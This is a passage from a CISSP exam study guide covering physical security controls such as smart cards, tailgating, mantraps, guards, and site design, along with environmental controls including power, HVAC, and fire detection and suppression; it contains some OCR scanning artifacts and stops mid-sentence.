A smart card is a physical access control device that is often used for electronic 
locks, credit card purchases, or dual-factor authentication systems. “Smart” means 
the card contains a computer circuit; another term for a smart card is “ Integrated 
Circuit Card ’ (ICC). 

Smart cards may be “contact” or “contactless.” Contact cards must be inserted 
into a smart card reader, while contactless cards are read wirelessly. One type of 
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contactless card technology is Radio-Frequency Identification (RFID). These cards 
contain RFID tags (also called transponders) that are read by RFID transceivers. 

A magnetic stripe card contains a magnetic stripe that stores information. Unlike 
smart cards, magnetic stripe cards are passive devices that contain no circuits. These 
cards are sometimes called swipe cards: they are read when swiped through a card 
reader. 

Many international credit cards are smart cards, while magnetic stripe cards are 
more commonly used as credit cards in the United States. 


NOTE 

The “Common Access Card” (CAC), as shown in Figure 4.41, is an example of a worldwide smart 
card deployment by the U.S. Department of Defense (DoD). These cards are used for physical 
access control as well as with smart card readers to provide dual-factor authentication to critical 
systems. CAC cards store data including cryptographic certificates as part of the DoD’s Public Key 
Infrastructure (PKI). In addition to providing strong authentication, the cards allow users to digitally 
sign documents, among other uses. 


Both smart and magnetic stripe may be used in combination with electronic locks 
to provide physical access control. This approach offers superior accountability 
when compared with mechanical locks: audit data can be collected electronically, 
showing a tally of all personnel as they enter and leave a building. This data can also 
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be used for safety purposes, providing the safety warden with an accurate census of 
personnel who must be accounted for during an evacuation. 

TAILGATING/PIGGYBACKING 

Tailgating (also known as piggybacking ) occurs when an unauthorized person 
follows an authorized person into a building after the authorized person unlocks 
and opens the door. Policy should forbid employees from allowing tailgating and 
security awareness efforts should describe this risk. 

Attackers attempting to tailgate often combine social engineering techniques, 
such as carrying large boxes, increasing the chances an authorized user will “help 
out” by holding the door open. 


LEARN BY EXAMPLE 

A Successful Tailgating Attack 

Johnny Long describes a successful tailgating attack during a physical penetration test in his 
book No Tech Hacking: A Guide to Social Engineering, Dumpster Diving, and Shoulder Surfing 
(ISBN: 978-1-59749-215-7, Syngress). [35] The target site had multiple defense-in-depth controls, 
including magnetic swipe cards, and armed guards posted internally as well as on roving patrols 
outside. His goal: gain access to a restricted internal area. 

Johnny created a telephone company badge with an inkjet printer, carried a toolbox with 
telephone logos, and dressed the part in work boots, jeans, and a T-shirt. He saw an area where 
smokers congregated near a side entrance. Approaching them directly from the outside would have 
drawn unnecessary attention, so he waited for all smokers to leave, and he quickly assumed the 
position outside the door, cigarette in hand. As other smokers came outside to smoke, he engaged in 
small talk, and referenced his (fictional) job onsite. 

As the smokers finished their break, one authenticated and opened the side door. Johnny held it 
open as the workers entered, and they thanked him for his politeness. Johnny followed them right 
in, no questions asked. 


MANTRAPS AND TURNSTILES 

A mantrap is a preventive physical control with two doors. The first door must close 
and lock before the second door may be opened. Each door typically requires a sepa- 
rate form of authentication to open; a common combination is PIN (Personal Iden- 
tification Number) and biometrics. The intruder is trapped between the doors after 
entering the mantrap. 

Turnstiles are designed to prevent tailgating by enforcing a “one person per 
authentication” rule, just as they do in subway systems. Secure data centers often 
use floor-to-ceiling turnstiles with interlocking blades to prevent an attacker 
from going over or under the turnstile. Secure revolving doors perform the same 
function. 

Both mantraps and turnstiles must be designed to allow safe egress in case of 
emergency. No system should require authentication for egress during emergencies. 
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CONTRABAND CHECKS 

Anyone traveling through airports is familiar with contraband checks, which seek to 
identify objects that are prohibited to enter a secure perimeter (such as an airplane). 
Secure buildings such as government or military buildings may also employ contra- 
band checks. 

These checks are often used to detect metals, weapons, or explosives. They may 
also be used to detect controlled substances such as illegal drugs. Another concern is 
portable cameras or storage media that may be used to exfiltrate sensitive data. 

Defense-in-depth strategies such as port blocking should be used in addition 
to contraband checks that seek to detect contraband such as portable media. For 
example, a “microSD” (micro Secure Digital) card used in some digital cameras can 
store multiple gigabytes of data and is smaller than a penny: small enough to evade 
all but the most thorough contraband checks. 

MOTION DETECTORS AND OTHER PERIMETER ALARMS 

Ultrasonic and microwave motion detectors work like “Doppler radar” used to pre- 
dict the weather. A wave of energy is sent out, and the “echo” is returned when it 
bounces off an object. A motion detector that is 20 feet away from a wall will con- 
sistently receive an echo in the time it takes for the wave to hit the wall and bounce 
back to the receiver, for example. The echo will be returned more quickly when a 
new object (such as a person walking in range of the sensor) reflects the wave. 

A photoelectric motion sensor sends a beam of light across a monitored space to 
a photoelectric sensor. The sensor alerts when the light beam is broken. 

Ultrasonic, microwave, and infrared motion sensors are active sensors, which 
means they actively send energy. A passive sensor can be thought of as a “read-only” 
device. An example is a passive infrared (PIR) sensor, which detects infrared energy 
created by body heat. 


EXAM WARNING 


We often think of technical controls like NIDS (Network Intrusion Detection Systems) when we 
hear the term “intrusion.” Motion detectors provide physical intrusion detection. 

It is important to remember that the original intrusions were committed by human “intruders” 
(who may have stormed a castle wall). If you see the term “intrusion” on the exam, be sure to look 
for the context (human or network-based). 


Perimeter alarms include magnetic door and window alarms. They include 
matched pairs of sensors on the wall, as well as window/door. An electrical circuit 
flows through the sensor pairs as long as the door or window is closed; the circuit 
breaks when either is opened. These are often armed for secured areas as well as in 
general areas during off hours such as nights or weekends. Once armed, a central 
alarm system will alert when any door or window is opened. 
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DOORS AND WINDOWS 

Always consider the relative strengths and weaknesses of doors, windows, walls, 
floors, ceilings, etc. All should be equally strong from a defensive standpoint: 
attackers will target the “weakest link in the chain” and should not find a weak spot 
to expose. Examples of “weakest link” design include a concrete wall with a hollow- 
core door, or a gypsum wall with a steel door. 

Door hinges should face inward, or be otherwise protected. Externally facing 
hinges that are not secured pose a security risk: attackers can remove the hinge pins 
with a hammer and screwdriver, allowing the door to be opened from the hinge side. 

Doors with electronic locks typically require a smart card or magnetic swipe 
card to unlock. Egress must be unimpeded in case of emergency, so a simple push 
button or motion detectors are frequently used to allow egress. In the latter case, 
there should be no gaps in the door and the internal motion sensor should be bolted 
securely to a fixed sturdy ceiling or wall. External attackers can attempt to trigger 
internal motion sensors by slipping paper through the door (trying to provide motion 
for the detector) or shaking the door violently (which will shake the surrounding 
wall or ceiling), causing a poorly mounted sensor to move and sense motion. For this 
reason, doors with internal motion sensors should never include mail slots. 

Externally facing emergency doors should be marked for emergency use only and 
equipped with panic bars. The use of a panic bar should trigger an alarm. 

Glass windows are structurally weak and can be dangerous when shattered. Bul- 
letproof or explosive-resistant glass can be used for secured areas. Wire mesh or 
security film can lower the danger of shattered glass and provide additional strength. 
Use of simple glass windows in a secure perimeter requires a compensating control 
such as window burglar alarms. 

Alternatives to glass windows include polycarbonate such as Lexan and acrylic 
such as Plexiglas. Lexan is used in racecars and airplanes for its strength and shatter 
resistance. 

WALLS, FLOORS, AND CEILINGS 

Walls around any internal secure perimeter such as a data center should be “slab to 
slab,” meaning they should start at the floor slab, and run to the ceiling slab. Raised 
floors and drop ceilings can obscure where the walls truly start and stop. An attacker 
should not be able to crawl under a wall that stops at the top of the raised floor, or 
climb over a wall that stops at the drop ceiling. 

Any wall protecting a secure perimeter (whether internal or external) should be 
strong enough to resist cutting by an attacker attempting to create an ingress point. 
Simple gypsum “sheetrock” walls can be cut open with a sharp tool such as a carpet 
knife, and should not be used for secure perimeters. 

Walls should have an appropriate fire rating (the amount of time required to fail 
due to a fire). The National Fire Protection Agency (NFPA) 75: Standard for the 
Protection of Information Technology Equipment states, “The computer room shall 
be separated from other occupancies within the building by fire-resistant rated walls, 
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floor, and ceiling constructed of noncombustible or limited combustible materials. 
The fire resistant rating shall be commensurate with the exposure, but not less than 
one hour.” [36] 

GUARDS 

Guards are a dynamic control that may be used in a variety of situations. Guards 
may aid in inspection of access credentials, monitor CCTVs, monitor environmental 
controls, respond to incidents, act as a deterrent (all things being equal, criminals are 
more likely to target an unguarded building over a guarded building), and much more. 

Professional guards have attended advanced training and/or schooling; amateur 
guards (sometimes derogatively called “Mall Cops”) have not. The term “ pseudo 
guard” means an unarmed security guard. 

Guard’s orders should be complete and clear. Written policies in binders sitting 
on shelves are not enough: the guards must be directly made aware of security risks. 
Guards are often attacked via social engineering, so this threat should be directly 
addressed via security awareness and training. 


LEARN BY EXAMPLE 

The Isabella Stewart Gardner Museum Heist 

A real-world example that illustrates this issue is the Isabella Stewart Gardner museum heist in 
Boston, Massachusetts. Two men who appeared to be police officers rang the buzzer on a museum 
door at 1:24 AM on March 18, 1990. Two amateur security guards (both college students) buzzed 
the “policemen” in. 

The guards were bound and gagged in the basement within minutes. The thieves worked their 
way through the museum, stealing 13 works by old masters. These included works by Degas, 

Manet, Vermeer, and Rembrandt (including Storm on the Sea of Galilee, Rembrandt’s only 
seascape). 

Over twenty years later, the crime has never been solved and the artwork (valued at hundreds 
of millions of dollars) remains lost. The retired museum security director said that “all guards who 
worked the night shift were warned in writing not to admit police officers who had not been directly 
summoned by the museum... the policy was written into the museum’s security manual, kept at the 
guard desk.” [37] 

Ensuring that written policies are read and understood is a required part of security awareness. 
As the Isabella Stewart Gardner heist teaches us, you cannot assume that a policy sitting on a shelf 
in a binder will be effective. 

Additionally, never hire an amateur to provide a professional service. Sites with critical assets 
to protect (such as banks, museums, etc.), should always hire professional physical security 
staff. Always perform a thorough and accurate risk analysis before deploying guards (amateur or 
professional). 


DOGS 

Dogs provide perimeter defense duties, guarding a rigid “turf.” They are often used 
in controlled areas, such as between the exterior building wall and a perimeter fence. 
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Dogs primarily serve as both deterrent and detective controls. A site without dogs is 
more likely to be physically attacked than a site with dogs (deterrent), and dogs alert 
security guards through barking (detective). 

The primary drawback to using dogs as a perimeter control is legal liability. Most 
security dogs are trained to “corner” a suspect (they are usually trained not to bite if 
the intruder is not moving). Unfortunately, many people do not know this (or simply 
panic and run at the site of a menacing guard dog). Many guard dogs are trained to 
attack a fleeing suspect. 

Tragedies have occurred when authorized personnel accidentally leave a build- 
ing and enter a secured area between the building and the fence perimeter (such as 
accidentally leaving via a hre door). 

RESTRICTED WORK AREAS AND ESCORTS 

Areas may be restricted by space (“authorized personnel only” areas) or time (visitor 
badges that are good for a specific period of time). One common attack is reusing 
old visitor badges for a later attack; this attack can be mitigated through time-based 
visitor badge control. Examples include electronic badges that automatically expire, 
printing the valid date and time usage in bold on the badge, and using different 
colored badges for different days of the week. 

Regular personnel or security guards, depending on the security policy of the site, 
may escort visitors. All such staff should be made aware of security dangers regarding 
escorts, such as social engineering attacks. All personnel should be trained to challenge 
any visitor who lacks a proper badge or escort, or to call security to report the incident. 


SITE SELECTION, DESIGN, AND CONFIGURATION 

Selection, Design, and Configuration describes the process of building a secure facil- 
ity such as a data center, from the site selection process through the final design. The 
exam could pose a scenario where you are asked about any part of the site selection 
process, beginning with the land the data center will be built on. 

There are many practical concerns when selecting a site, such as parking, acces- 
sibility via roads, public transportation, nearby amenities and hotels, etc. The exam 
focuses on security concerns. Remember that physical safety of personnel is the top 
priority when selecting, designing, and configuring a site. 

SITE SELECTION ISSUES 

Site selection is the “greenfield” process of choosing a site to construct a building or 
data center. A greenfield is an undeveloped lot of land, which is the design equivalent 
of a blank canvas. 

Topography 

Topography is the physical shape of the land: hills, valleys, trees, etc. Highly secure 
sites such as military installations will leverage (and sometimes alter) the topography 
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of the site as a defensive measure. Topography can be used to steer ingress and egress 
to controlled points. For example, if an attacker is going to attempt to drive a car bomb 
into a building, it should occur at a controlled and hardened class IV gate, as opposed 
to a weaker side wall. 

Utility Reliability 

The reliability of local utilities is a critical concern for site selection purposes. Elec- 
trical outages are among the most common of all failures and disasters we experi- 
ence. Uninterruptible Power Supplies (UPSs) will provide protection against elec- 
trical failure for a short period (usually hours or less). Generators provide longer 
protection, but will require refueling in order to operate for extended periods. 

Crime 

Local crime rates also factor into site selection. The primary issue is employee 
safety: all employees have the right to a safe working environment. Additional issues 
include theft of company assets. 

SITE DESIGN AND CONFIGURATION ISSUES 

Once the site has been selected, a number of design decisions must be made. Will the 
site be externally marked as a data center? Is there shared tenancy in the building? 
Where is the telecom demarc (the telecom demarcation point)? 

Note that secure site design cannot compensate for poor site selection decisions. 
These are complementary concepts that embody parts of physical defense-in-depth. 

Site Marking 

Many data centers are not externally marked to avoid drawing attention to the facil- 
ity (and the expensive contents within). Similar controls include attention-avoiding 
details such as muted building design. 


LEARN BY EXAMPLE 

Netflix Obscurity 

The Netflix DVD service avoids site marking of its service centers, which look like nondescript 
warehouses in regular office parks. There are no Netflix signs or corporate logos to be seen. 

Assuming a low profile avoids drawing unwanted attention to the warehouses, which adds 
defense-in-depth protection to the valuable contents inside. As an additional bonus, this encourages 
subscribers to return DVDs via postal mail (as opposed to attempting to return DVDs by dropping 
them off in person). 


Shared Tenancy andAdjacent Buildings 

Other tenants in a building can pose security issues: they are already behind the 
physical security perimeter. Their physical security controls will impact yours: a 
tenant’s poor visitor security practices can endanger your security, for example. 

Adjacent buildings pose a similar risk. Attackers can enter a less secure adjacent 
building and use that as a base to attack an adjacent building, often breaking in 
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through a shared wall. Many bank heists have been pulled off this way; including the 
theft of over $20 million dollars from British Bank of the Middle East in 1976 (the 
attackers blasted a hole through the shared wall of an adjacent church). For more de- 
tail see: http://www.dailymail.co.uk/home/moslive/article-4591 85/Soldiers-Fortune. 
html. 

Another security risk associated with shared tenancy (or neighbors who are 
physically close) is wireless security. Physical proximity is required to launch many 
types of wireless attacks. Also, neighbors running wireless equipment at the same 
frequency as you can cause interference, raising wireless availability issues. 

Wiring Closets 

Lack of sufficient security for wiring closets can introduce significant physical 
access issues. If an adversary gained access to wiring closets, they could potentially: 
connect rogue systems or access points to the network; deny service to critical sys- 
tems by disconnecting network cables, degrade performance by introducing layer 
2 loops, disrupt the ability to manage network devices, intercept network traffic, or 
even physically destroy network cabling. The above is by no means an exhaustive 
list, and also does not present scenarios that would necessarily be viable. Technical 
or logical defenses could mitigate some of the challenges above. However, with 
physical access to networking devices, the expectation is that an adversary could 
cause harm, in spite of significant logical security. 

Shared Demarc 

A crucial issue to consider in a building with shared tenancy is a shared demarc (the 
demarcation point, where the ISP’s (Internet Service Provider) responsibility ends 
and the customer’s begins). Most buildings have one demarc area, where all external 
circuits enter the building. Access to the demarc allows attacks on the confidentiality, 
integrity, and availability of all circuits and the data flowing over them. 

Shared demarcs should employ strong physical access control, including iden- 
tifying, authenticating, and authorizing all access. Accountability controls should 
be in place to reconstruct any events. For very secure sites, construction of multiple 
segregated demarcs is recommended. 

Server Rooms 

Obviously controlling and auditing physical access to server rooms is necessary to 
maintain physical security. However, more than simple access control is required to 
ensure proper security is maintained. Organizations are typically cognizant of the 
risks associated with poor door security, but consideration must also be given to the 
security of the walls, floors, and ceilings as points of potential access to the server 
rooms. These concerns are amplified in multi-tenant facilities. In addition to sim- 
ply providing physical proximity to outsiders, multi-tenant facilities have often been 
designed with simple restructuring of floor and office space in mind. These flexible 
workspaces often lack the level of security needed for appropriately securing server 


rooms. 
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Beyond physical access control, environmental controls must also be adequate to 
provide expected levels of uptime and availability. Power and HVAC (Heating Ven- 
tilation, and Air Conditioning) are crucial environmental factors that can negatively 
impact security for server rooms if not carefully designed and maintained. 

Media Storage Facilities 

Offline storage of media for disaster recovery, potential legal proceedings, or other 
legal or regulatory purposes is commonplace. An offsite media storage facility 
should be employed to ensure that the data is accessible even after a physical disaster 
at the primary facility. The purpose of the media being stored offsite is to ensure 
continued access, which means the facility should be far enough removed from the 
primary facility to avoid the likelihood of a physical disaster impacting both the pri- 
mary facility and the offsite storage location. Licensed and bonded couriers should 
be used for the transfer of media to and from the offsite storage facility. 

Due to the sensitive nature of the data contained within, media storage facilities 
must be adequately protected. Many of the same concerns that apply to server rooms 
are applicable here also. A difference is the approach to environmental controls. Given 
the offline nature of the media storage the same care is typically not required for power 
considerations due to the lack of uptime concerns. However, don't neglect the envi- 
ronmental controls altogether. While the cost and design of the HVAC would likely be 
significantly lower in media storage facilities, the organization must still ensure that the 
media is stored in a manner that does not significantly diminish future access to the data. 


SYSTEM DEFENSES 

System Defenses are one of the last lines of defense in a defense-in-depth strategy. 
These defenses assume an attacker has physical access to a device or media contain- 
ing sensitive information. In some cases, other controls may have failed and these 
controls are the final control protecting the data. 

ASSET TRACKING 

Detailed asset tracking databases enhance physical security. You cannot protect 
your data unless you know where (and what) it is. Detailed asset tracking databases 
support regulatory compliance by identifying where all regulated data is within a 
system. In case of employee termination, the asset database will show exactly what 
equipment and data the employee must return to the company. Data such as serial 
numbers and model numbers are useful in cases of loss due to theft or disaster. 

PORT CONTROLS 

Modern computers may contain multiple “ports” that may allow copying data to 
or from a system. The Universal Serial Bus (USB) is a common example; newer 
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systems usually have multiple USB ports. USB drives can be small (some are smaller 
than a piece of chewing gum) and inexpensive and may hold dozens of gigabytes 
or more. 

Port controls are critical because large amounts of information can be placed on 
a device small enough to evade perimeter contraband checks. Ports can be physically 
disabled; examples include disabling ports on a system’s motherboard, disconnect- 
ing internal wires that connect the port to the system, and physically obstructing the 
port itself. 

Ports may also be electronically locked via system policy. Locking ports via 
Microsoft Windows Active Directory Group Policy is an example of enterprise-level 
port controls. 


ENVIRONMENTAL CONTROLS 

Environmental controls are designed to provide a safe environment for personnel and 
equipment. Power, HVAC, and fire safety are considered environmental controls. 

ELECTRICITY 

Reliable electricity is critical for any data center, and is one of the top priorities when 
selecting, building, and designing a site. 

Types of Electrical Faults 

Electrical faults involve short and long-term interruption of power, as well as various 
cases of low and high voltage. All types of electrical faults can impact availability 
and integrity. A blackout may affect availability of the system, for example, but can 
also impact integrity if a hard disk is damaged due to sudden loss of power. 

The following are common types of electrical faults: 

• Blackout: prolonged loss of power 

• Brownout: prolonged low voltage 

• Fault: short loss of power 

• Surge: prolonged high voltage 

• Spike: temporary high voltage 

• Sag: temporary low voltage 

Surge Protectors, UPSs, and Generators 

Surge Protectors, UPSs, and generators provide protection against one of the most 
common physical and environmental failures: electrical failures. 

Surge Protectors 

Surge Protectors protect equipment from damage due to electrical surges. They con- 
tain a circuit or fuse that is tripped during a power spike or surge, shorting the power 
or regulating it down to acceptable levels. 
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Uninterruptible Power Supplies 

Uninterruptible Power Supplies (UPSs) provide temporary backup power in the 
event of a power outage. They may also “clean” the power, protecting against surges, 
spikes, and other forms of electrical faults. 

UPS backup power is provided via batteries or fuel cells. UPSs provide power for 
a limited period of time, and can be used as a bridge to generator power; generators 
typically take a short period of time to start up and begin providing power. 

Generators 

Generators are designed to provide power for longer periods of times than UPSs, 
and will run as long as fuel is available. Sufficient fuel should be stored onsite for 
the period the generator is expected to provide power. Refueling strategies should 
consider a disaster’s effect on fuel supply and delivery. 

Generators should not be placed in areas that may flood or otherwise be impacted 
by weather events. They also contain complex mechanics and should be tested and 
serviced regularly. 


LEARN BY EXAMPLE 

Hurricane Katrina 

Natural disasters such as the Katrina Hurricane of 2005 can teach us lessons on emergency 
preparedness, including the use of generators. Most generators in New Orleans, Louisiana, failed 
after power was lost. Many generators were located in low areas that flooded; others failed due to 
poor maintenance. 

Of the remaining generators that were located above floodwaters and properly maintained, most 
ran out of fuel. Gasoline and diesel were widely unavailable due to power outages, floods, and 
related loss and damage to infrastructure such as impassable roads. 

Always place generators above potential floodwaters, and make every effort to place them 
in areas unlikely to be impacted by other natural disasters. Generators are complex and prone to 
failure: proactive maintenance should be regularly performed. Refueling generators can be highly 
problematic after a wide-scale natural disaster, so always consider this issue when designing fuel 
storage and generator refueling plans. This white paper discusses the problem in detail: http://www. 
cumminspower.com/www/literature/technicalpapers/PT-7006-Standby- Katrina-en.pdf 


EMI 

Electricity generates magnetism, so any electrical conductor emits Electromagnetic 
Interference (EMI). This includes circuits, power cables, network cables, and many 
others. Network cables that are poorly shielded or run too closely together may suf- 
fer crosstalk, where magnetism from one cable “crosses” over to another nearby 
cable. This primarily impacts the integrity (and may also affect the confidentiality) 
of network or voice data. 

Crosstalk can be mitigated via proper network cable management. Never route 
power cables close to network cables. Network cable choice can also lower crosstalk: 
Unshielded Twisted Pair (UTP) cabling is far more susceptible than Shielded Twist- 
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ed Pair (STP) or coaxial cable. Fiber optic cable uses light instead of electricity to 
transmit data, and is not susceptible to EMI. 


NOTE 

Have you ever had a phone conversation where you could hear another conversation from another 
phone call? It is often faint and hard to understand, but unmistakably there. 

That is crosstalk: there was another phone cable that was too close or poorly shielded 
somewhere between you and the person you were speaking with. EMI jumped from that cable to 
yours, which you could hear as faint voices. In CISSP® terms, the integrity of your conversation 
was impacted (as well as the confidentiality of the other call). 


HVAC 

HVAC (heating, ventilation, and air conditioning) controls keep the air at a reason- 
able temperature and humidity. They operate in a closed loop, recirculating treated 
air. This helps reduce dust and other airborne contaminants. 

Positive Pressure and Drains 

All HVAC units should employ positive pressure and drainage. This means air and 
water should be expelled from the building. Untreated air should never be “inhaled” 
into the building, and water should drain away from the building. 

A common malfunction of HVAC units is condensation of water pooling into 
the building, often going under raised floors where it may not be detected. Positive 
drains are designed to avoid this problem. Location of all gas and water lines, as well 
as all drains, should be formally documented. 

Heat and Humidity 

Data center HVAC units are designed to maintain optimum heat and humidity levels 
for computers. Humidity levels of 40-55% are recommended. A commonly recom- 
mended “set point” temperature range for a data center is 68-77°F (20-25°C). 

With sufficient data center airflow, somewhat higher temperatures can be used. 
This can result in energy savings; however, the data center may heat to dangerous 
levels more quickly in the event of HVAC failure. 


NOTE 

Many sources cite 68-72°F (20-22°C) as the optimum data center temperature range; in 2004, 
the American Society of Heating, Refrigerating and Air-Conditioning Engineers (ASHRAE) 
recommended up to 77°F/25°C. 

There is a recent “green” push to save energy costs by allowing a wider range for both 
temperature and humidity levels. As a result, the 2008 ASHRAE recommendations allow a much 
wider range: temperature of 18°C (64.4°F) to 27°C (80.6°F) and humidity from 25% to 60%, 
depending on the dew point. Higher set points require adequate airflow. Details may be found at 

http://tc99.ashraetcs.org. 
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Static and Corrosion 

Ever touch metal and receive a small shock? That is caused by buildup of static 
electricity; low humidity may cause such buildup. Static will discharge to balance a 
positive and negative electrical imbalance: sudden static discharge can cause damage 
from system reboots to chip or disk damage. 

Static is mitigated by maintaining proper humidity, proper grounding all circuits 
in a proper manner, and using antistatic sprays, wrist straps, and work surfaces. All 
personnel working with sensitive computer equipment such as boards, modules, or 
memory chips should ground themselves before performing any work. 

High humidity levels can allow the water in the air to condense onto (and into) 
equipment, which may lead to corrosion. Maintaining proper humidity levels miti- 
gates both static and corrosion. 

Airborne Contaminants 

Airborne contaminants pose another risk to computer equipment. Dust is a common 
problem: airborne dust particles can be drawn into computer enclosures, where they 
become trapped. Built-up dust can cause overheating and static buildup. CPU fans 
can be impeded by dust buildup, which can lead to CPU failure due to overheating. 
Other contaminants can cause corrosion or damaging chemical reactions. 

HVAC units typically operate in a closed loop, conditioning recirculating air. 
Positive pressure keeps untreated air from entering the system. Any untreated air 
should be filtered for contaminant with filters such as HEPA (high efficiency par- 
ticulate air) filters. 

HEAT, FLAME, AND SMOKE DETECTORS 

Heat detectors, flame detectors, and smoke detectors provide three methods for 
detecting fire. They typically alert locally, and may also be centrally monitored by a 
fire alarm system. In addition to creating an audible alarm, flashing lights should also 
be used, so that both deaf and blind personnel will be aware of the alarm. 

Heat Detectors 

Heat detectors alert when temperature exceeds an established safe baseline. They 
may trigger when a specific temperature is exceeded or when temperature changes at 
a specific rate (such as “10°F in less than 5 minutes”). 

Smoke Detectors 

Smoke detectors work through two primary methods: ionization and photoelectric. 
Ionization-based smoke detectors contain a small radioactive source that creates a 
small electric charge. Photoelectric sensors work in a similar fashion, except that 
they contain an LED (Light Emitting Diode) and a photoelectric sensor that gener- 
ates a small charge while receiving light. Both types of alarm alert when smoke inter- 
rupts the radioactivity or light, lowering or blocking the electric charge. 

Dust should always be avoided in data centers. Small airborne dust particles can 
trigger smoke detectors just as smoke does, leading to false alarms. 
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Flame Detectors 

Flame detectors detect infrared or ultraviolet light emitted in fire. One drawback to 
this type of detection is that the detector usually requires line-of-site to detect the 
flame; smoke detectors do not have this limitation. 

PERSONNEL SAFETY, TRAINING AND AWARENESS 

As stated previously, personnel safety is the number one goal of physical security. 
This includes the safety of personnel while onsite and off. Safety training provides 
a skill set such as learning to operate an emergency power system. Safety awareness 
changes user behavior (“Don’t let anyone follow you into the building after you 
swipe your access card”). Both safety training and awareness are critical to ensure 
the success of a physical security program. You can never assume that average per- 
sonnel will know what to do and how to do it: they must be trained and made aware. 


EXAM WARNING 


Physical security training and awareness is critical because of the possible stakes: injury or loss of 
life. Safety is the primary goal of all physical security controls. 


Evacuation Routes 

Evacuation routes should be prominently posted, as they are in hotel rooms. All per- 
sonnel should be advised of the quickest evacuation route from their areas. Guests 
should be advised of evacuation routes as well. 

All sites should use a meeting point, where all personnel will meet in the event of 
emergency. Meeting points are critical: tragedies have occurred where a person out- 
side the front of a building does not realize another is outside the back, and reenters 
the building for attempted rescue. 

Evacuation Roles and Procedures 

The two primary evacuation roles are safety warden and meeting point leader. The 
safety warden ensures that all personnel safely evacuate the building in the event of an 
emergency or drill. The meeting point leader assures that all personnel are accounted 
for at the emergency meeting point. Personnel must follow emergency procedures, 
and quickly follow the posted evacuation route in case of emergency or drill. 

Special care should be given to any personnel with handicaps, which could 
affect egress during an emergency. Elevators should never be used during a fire, 
for example, which could impede the egress of personnel in wheelchairs. All sites 
should have mitigating controls to allow safe egress for ah personnel. 

Duress Warning Systems 

Duress warning systems are designed to provide immediate alerts to personnel 
in the event of emergencies, such as severe weather, threat of violence, chemical 
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contamination, etc. Duress systems may be local and include technologies such as 
use of overhead speakers, or use of automated communications such as email, pagers 
or phone calls. National duress safety systems include the United States Federal 
Communication Commission's Emergency Alert System (formerly known as the 
Emergency Broadcast System). 

Travel Safety 

Personnel must be safe while working in all phases of business. This obviously 
includes work performed onsite, but also includes authorized work from home, and 
business travel. Telecommuters should have proper equipment, including ergonomi- 
cally safe workstations. 

Business travel can be dangerous to certain areas. Organizations such as the 
United States State Department Bureau of Consular Affairs issue travel warnings 
(available at: http://travel.state.gov/); such warnings should be consulted and heeded 
before travel to foreign countries. 

ABCD FIRES AND SUPPRESSION 

The primary safety issue in case of fire is safe evacuation. Fire suppression systems are 
used to extinguish fires, and different types of fires require different suppressive agents. 
These systems are typically designed with personnel safety as the primary concern. See 
Figure 4.42 for a summary of fire class symbols used in the United States. 

Classes of Fire and Suppression Agents 

Class A fires are common combustibles such as wood, paper, etc. This type of fire is 
the most common and should be extinguished with water or soda acid. 

Class B fires are burning alcohol, oil, and other petroleum products such as gaso- 
line. They are extinguished with gas or soda acid. You should never use water to 
extinguish a class B fire. 

Class C fires are electrical fires that are fed by electricity and may occur in equip- 
ment or wiring. Electrical fires are Conductive fires, and the extinguishing agent must 
be non-Conductive, such as any type of gas. Many sources erroneously list soda acid 
as recommended for class C fires: this is incorrect, as soda acid can conduct electricity. 
Class D fires are burning metals and are extinguished with dry powder. 

Class K fires are kitchen fires, such as burning oil or grease. Wet chemicals are 
used to extinguish class K fires. 


NOTE 

This section refers to the National Fire Protection Agency (NFPA) fire code conventions, primarily 
used in the United States. Other countries have other conventions. For example, Europe’s system 
models the US for class A and B and D fires, but considers flammable gases as class C fires, 
electrical fires as class E fires, and kitchen fires as class F. See Table 4.18 for a comparison. The 
NFPA’s site is at http://www.nfpa.org. European fire classes are discussed here: http://www. 
firesafe.org.uk/html/fsequip/exting.htm. 
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CLASS OF FIRE 


TYPES OF FIRE 


EXTINGUISHER SYMBOLS 


RATING SYMBOL 


PICTURE SYMBOL 


Ordinary Combustibles 


Wood 

Paper 

Rubber 

Plastic 




B 


Flammable Liquids 


Liquids 

Greases 

Gases 



/ 

A — ^ 

^ 



Energized Electrical 
Equipment 


Electrical Equipment 




Combustible Metals 


Magnesium 

Zinc 

Calcium 

Titanium 

Lithium 



% 


K 


Cooking Media 


Vegetable Oils 
Animal Oils 
Fats / Lards 


o 



FIGURE 4.42 United States Fire Classes [38] 
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Table 4.18 Classes of Fire and Suppression Agents 


US Class 

Europe Class 

Material 

Suppression Agent 

A 

A 

Ordinary Combustibles 
such as wood and paper 

Water or Soda Acid 

B 

B 

Liquid 

Flalon/Halon substitute, 

C0 2 , or Soda acid 

B 

C 

Flammable Gases 

Flalon/Halon substitute, 

C0 2 , or Soda acid 

C 

E 

Electrical Equipment 

Halon/Halon substitute, 

C0 2 

D 

D 

Combustible Metals 

Dry powder 

K 

F 

Kitchen (oil or fat) Fires 

Wet chemicals 


EXAM WARNING 


The CISSP® exam is an international exam. Always beware of questions that may be answered 
differently based on location: make sure you give the best answer to the question (and not the 
answer for your given locale). Names for types of fires are one example; others include laws, and 
metric measures such as meters versus American/imperial measures such as yards. 


TYPES OF FIRE SUPPRESSION AGENTS 

Always consult local fire code before implementing a fire suppression system. Your 
local fire marshal is an excellent expert source: experts always prefer to prevent a fire 
rather than extinguish one, and are often generous with their time dedicated to preven- 
tive measures. Any rules of thumb mentioned in this text will be valid for the exam, 
but always check your local fire codes before implementing any of these controls. 

All fire suppression agents work via four methods (sometimes in combination): 
reducing the temperature of the fire, reducing the supply of oxygen, reducing the 
supply of fuel, and interfering with the chemical reaction within fire. 


EXAM WARNING 


Always consider “hire or ask an expert” as a valid choice for any exam question asking about “the 
best thing to do.” Do not fall for the engineer’s trap of “I will figure this out on my own.” That 
mindset may make for good engineers, but can lead to disastrous physical security decisions. 

Maintain the highest standard regarding safety on the exam; the safest answer is often the best. 
This also applies to issues of legality, ethics, and fairness: the most legal, ethical, and fair answers 
are often the best. 


Water 

Water suppresses fire by lowering the temperature below the kindling point 
(also called the ignition point). Water is the safest of all suppressive agents, and 
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recommended for extinguishing common combustible fires such as burning paper or 
wood. It is important to cut electrical power when extinguishing a fire with water to 
reduce the risk of electrocution. 

Soda Acid 

Remember those old giant brass fire extinguishers? They were about the size of a 
fire hydrant, and weighed almost as much. They used soda acid, which is also how 
they were pressurized. The cylinder was filled with soda (sodium bicarbonate) mixed 
with water, and there was a glass vial of acid suspended at the top. When you wanted 
to use the fire extinguisher, you would break the vial via a lever (or pick the extin- 
guisher up and slam it on the floor). This would break the glass vial and mix the acid 
with the soda water, creating a chemical reaction that would create gas (thus pressur- 
